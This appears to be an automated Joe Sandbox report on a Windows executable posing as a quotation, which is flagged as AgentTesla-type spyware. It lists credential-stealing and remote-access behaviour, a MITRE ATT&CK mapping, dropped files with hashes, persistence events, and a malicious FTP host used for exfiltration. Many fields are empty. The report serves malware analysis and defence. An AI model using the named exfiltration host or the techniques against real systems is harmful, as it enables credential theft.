Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | File opened: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | File opened: | |||
Source: | File opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | File opened: | |||
Source: | File opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | File opened: | |||
Source: | File opened: | |||
Source: | Key opened: | |||
Source: | Key opened: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 31 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 12 Software Packing | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 31 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
58% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML | |||
58% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal | ||
58% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org | 104.26.12.205 | true | false | unknown | |
ftp.haliza.com.my | 110.4.45.197 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false | |
110.4.45.197 | ftp.haliza.com.my | Malaysia | 46015 | EXABYTES-AS-APExaBytesNetworkSdnBhdMY | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1520520 |
Start date and time: | 2024-09-27 13:09:05 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 11m 17s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 30 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | rQuotation3200025006.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@39/20@2/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtAllocateVirtualMemory calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: rQuotation3200025006.exe
Time | Type | Description |
---|---|---|
07:09:58 | API Interceptor | |
07:10:01 | API Interceptor | |
07:10:04 | API Interceptor | |
07:10:17 | API Interceptor | |
12:10:03 | Task Scheduler | |
12:10:08 | Autostart | |
12:10:16 | Autostart |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.26.12.205 | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse |
| |
Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Stealc, Vidar | Browse |
| ||
Get hash | malicious | LummaC, Stealc, Vidar | Browse |
| ||
Get hash | malicious | LummaC, Stealc, Vidar | Browse |
| ||
Get hash | malicious | LummaC, Stealc, Vidar | Browse |
| ||
Get hash | malicious | LummaC, Stealc, Vidar | Browse |
| ||
110.4.45.197 | Get hash | malicious | AgentTesla | Browse | ||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
api.ipify.org | Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse |
| ||
Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse |
| ||
Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | Browse |
| ||
ftp.haliza.com.my | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
| ||
EXABYTES-AS-APExaBytesNetworkSdnBhdMY | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Clipboard Hijacker, Stealc, Vidar | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Snake Keylogger | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Amadey, Stealc | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Process: | C:\Users\user\AppData\Roaming\pBBqGOzrz.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1216 |
Entropy (8bit): | 5.34331486778365 |
Encrypted: | false |
SSDEEP: | 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ |
MD5: | 1330C80CAAC9A0FB172F202485E9B1E8 |
SHA1: | 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492 |
SHA-256: | B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560 |
SHA-512: | 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rQuotation3200025006.exe.log
Download File
Process: | C:\Users\user\Desktop\rQuotation3200025006.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1216 |
Entropy (8bit): | 5.34331486778365 |
Encrypted: | false |
SSDEEP: | 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ |
MD5: | 1330C80CAAC9A0FB172F202485E9B1E8 |
SHA1: | 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492 |
SHA-256: | B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560 |
SHA-512: | 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2 |
Malicious: | true |
Preview: |
Process: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1216 |
Entropy (8bit): | 5.34331486778365 |
Encrypted: | false |
SSDEEP: | 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ |
MD5: | 1330C80CAAC9A0FB172F202485E9B1E8 |
SHA1: | 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492 |
SHA-256: | B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560 |
SHA-512: | 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2232 |
Entropy (8bit): | 5.380805901110357 |
Encrypted: | false |
SSDEEP: | 48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z+Uyus:lGLHyIFKL3IZ2KRH9OugIs |
MD5: | BB0D009D716C19EF3E3D871F7E5615A7 |
SHA1: | 24A3A9549BBF1704F44604631DF92D78D48ED3B5 |
SHA-256: | CAD65E7B83D76910680E43406ED1EEF6BB6CDC27ED79E3462EDD5F90CFD37F05 |
SHA-512: | D3159537188A4AE3F51CA245E63DAFDFA286D6172573847371382F84A4B5F819730B03F4A541BBEAAC022F20F283B92127C526A675FEB1D33636FF17CBDD0C17 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\pBBqGOzrz.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1575 |
Entropy (8bit): | 5.11956975542299 |
Encrypted: | false |
SSDEEP: | 24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv |
MD5: | 0BC1179F57AA1484371BB1B435F4BD7D |
SHA1: | CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F |
SHA-256: | C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5 |
SHA-512: | A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\rQuotation3200025006.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1575 |
Entropy (8bit): | 5.11956975542299 |
Encrypted: | false |
SSDEEP: | 24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv |
MD5: | 0BC1179F57AA1484371BB1B435F4BD7D |
SHA1: | CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F |
SHA-256: | C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5 |
SHA-512: | A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A |
Malicious: | true |
Preview: |
Process: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1575 |
Entropy (8bit): | 5.11956975542299 |
Encrypted: | false |
SSDEEP: | 24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv |
MD5: | 0BC1179F57AA1484371BB1B435F4BD7D |
SHA1: | CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F |
SHA-256: | C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5 |
SHA-512: | A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1575 |
Entropy (8bit): | 5.11956975542299 |
Encrypted: | false |
SSDEEP: | 24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv |
MD5: | 0BC1179F57AA1484371BB1B435F4BD7D |
SHA1: | CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F |
SHA-256: | C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5 |
SHA-512: | A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\rQuotation3200025006.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 645120 |
Entropy (8bit): | 7.93913808186164 |
Encrypted: | false |
SSDEEP: | 12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx |
MD5: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
SHA1: | DE74DBF7BAC85A3A06C7038A4D4241389E6A5C8F |
SHA-256: | FDA83ECB5BD6A07DEDAF6BE0FCE7C626E21E9DF94D82DDB905460E9D6A25A162 |
SHA-512: | 661CDEE4EFE389DAC6AB7D8F5CF92A04403E7B6934942E18B4D2E5A7C609DF58EEA44D2E85EBB9592BF8544BC89C543CC7F01A2E67E0D1041AA22654CCBF124C |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Users\user\Desktop\rQuotation3200025006.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
